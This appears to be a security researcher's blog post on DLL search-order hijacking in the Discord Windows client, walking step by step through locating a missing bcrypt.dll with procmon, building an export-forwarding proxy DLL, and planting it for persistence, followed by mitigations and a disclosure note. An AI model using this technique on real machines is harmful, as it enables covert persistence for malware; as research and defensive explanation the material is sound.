Discord Dll Hijacking, An Old Attack On A Popular Chat Application
While researching techniques for persistence on windows I came across a technique quite interesting and very applicable to many situations. This technique is Dll hijacking and I used it against one of the most popular chat platforms for windows.

The Impact On Discord
The Discord application suffers from a vulnerability that allows code to be executed every time Discord runs. This is because every time Discord runs it loads dlls in an unsafe way. Even worse the directory is user writable as it is not in a secure directory such as program files because of this you do not need admin for this attack. This attack can be used to maintain persistence on a target machine which can bypass malware persistence detection from many antiviruses. A video that shows this code execution in Discord is linked below.
The rest of the article covers the technical aspect of the vulnerability and how to find and go about dll hijacking and how to mitigate it.
The Theory
The theory behind dll hijacking must be understood to use it effectively. Dll hijacking is tricking a program into loading a different dll then it intended. The technique was discovered a while ago but is not discussed frequently anymore. This technique can be used if the dll search order of the program is insecure. The search order is the order that dlls are loaded by a program. By default whenever dlls are loaded into a program in windows it will use the search order indicated by the diagram below.

The program directory is highlighted red as it is the most occurring weak point within the windows environment. The reason this is a weak point is that even if there is no dll within the program directory it is still searched by the program by default. This allows a user or a malicious program to put a dll in this location and it will be executed by the vulnerable program whenever the dll is called. The way that will be shown to exploit this is using a proxy dll to forward all calls to the real dll but run a program as well with the proxy dll. I will be basing this approach off of this paper by Craig Heffner but will be documenting the a bit more thoroughly and modernly by showing a error that might be encountered and how to fix it as well as a program to generate some code.
Theory In Practice
To find and exploit dll hijacking with the proxy dll method requires a few steps and this part will be sectioned as such. In this case I will be using Discord as the example test program.
Step 1. Finding Insecure Dll Loading
To find cases of insecure dll loading the best tool to use is windows procmon. First open procmon let it fully load and then open the program to test. Allow for the test program to fully load. Next save the log so the test program does not have to be constantly rerun to sample data. Close procmon and open the data saved with procmon. Now filter the data using the filter tab to limit the log to the test program and the event to CreateFile and you will be given a screen that looks like this.

We are now looking for cases in which it says “NAME NOT FOUND” under result as it denotes that it attempted to load a file but failed. We want to find dll files that fail to load that are located in the program directory. Path filtering can be used to simplify this search but in this case I simply looked through all of the results. After parsing the list I found a suitable dll known as “bcrypt.dll” that was attempted to be loaded in Discords program directory.

Now to verify simply put a dummy dll file there and if you get an error by the test program it means that it tried to load the dll proving that this attack can be implemented.

Now that this is confirmed you must actually write the proxy dll detailed in the next step.
Step 2. Writing The Proxy Dll
To actually get our proxy dll to load our real dll so the program runs normally with our malicious dll we must proxy the real dll functions. The best program to use to find the functions to proxy from a dll is Dll Export Viewer. Open the program and load the functions from the legitimate dll which in “bcrypt.dll” and most cases can be found in the windows directory. After loading you should be greeted by a screen similar to this.

Generate a log of all the functions by going under view and clicking html report all functions. Now we must open a empty project in visual studio of a dll and create our .cpp file. To proxy the functions we must convert the report into code that actually proxys the individual functions. I wrote a program that does this located on my github. Run my program and supply the html report file as input. Copy the code from the result of my program into the .cpp file with “#pragma once” written above it. It should look like the image below and you can also compare with the proxy dll for Discord which is on my github.

The name you entered for the dll is shown right after the = which in my case is “payload” so it is forwarding the functions to “payload.dll”. Now that the proxy code is done we can now write the code we want to execute in our proxy dll. I will be having it pop a message box up that tells of its spawn location. Again the code of that is shown in the image below and all the code for this is on my github.

Step 3. Using Our Proxy Dll
The proxy dll code is now written. Compile it and rename it to the original dll the test program tried to load a.k.a the dll you are hijacking. Now put the proxy dll that was compiled into the dll hijack location which in my case is Discords program folder in the current users local appdata. Execute the test program and if everything is written right you will receive this error expect the dll name will be what you entered.

All that is needed now is to copy the real dll and name it as the dll shown by the error. The real dll discord is trying to load is “bcrypt.dll” so I will name the real “bcypt.dll” “payload.dll” and put it into discord program directory. When this is done and the program is run it will execute our code as shown by the image below and the program will continue normally.

Fix For A Frequent Error
An error that can occur is using the wrong architecture for the real dll that you are proxying to. If this is the case you will receive the error below but can be fixed by using the right real dll architecture.

Mitigation
The way windows loads dlls is flawed but there are ways to mitigate dll hijacking. Most of these prevention's must be done by the programmers however. The practices that are listed by my article originate from this article on Finjans blog. I would recommended reading the article as it explains dll hijacking very well and lists some examples of it.
Privilege
By simply making a programs folder only admin writable prevents programs run as a user to write to these vulnerable locations and exploit a dll hijacking vulnerability.
Remote Shares
As referenced by many articles on dll hijacking loading a shared dll from a web share is not a good idea as this can be replaced by anyone. Loading a dll from a web share by my knowledge however is not the most common practice.
Dll Load Location Path
Simply loading dlls from a hard coded path will completely skip the search order preventing search order hijacking.
Conclusion
Dll hijacking is still an issue in the modern day and can be used by malware authors to maintain access to a computer. The prevalence of this vulnerability is proven by its presence in discord and its history in many other programs. Many malware authers have targeted this type of vulnerability. More must be done to protect users computers by program authors by implementing secure dll loading programming practices. Windows is also at fault for having such a insecure dll loading practice in the first place.

Disclosure Of Discord Vulnerability
I contacted Discord security before I wrote this article and they did not deem it as an issue. If you want logs of these emails than contact me at my twitter handle @Acew0rm1
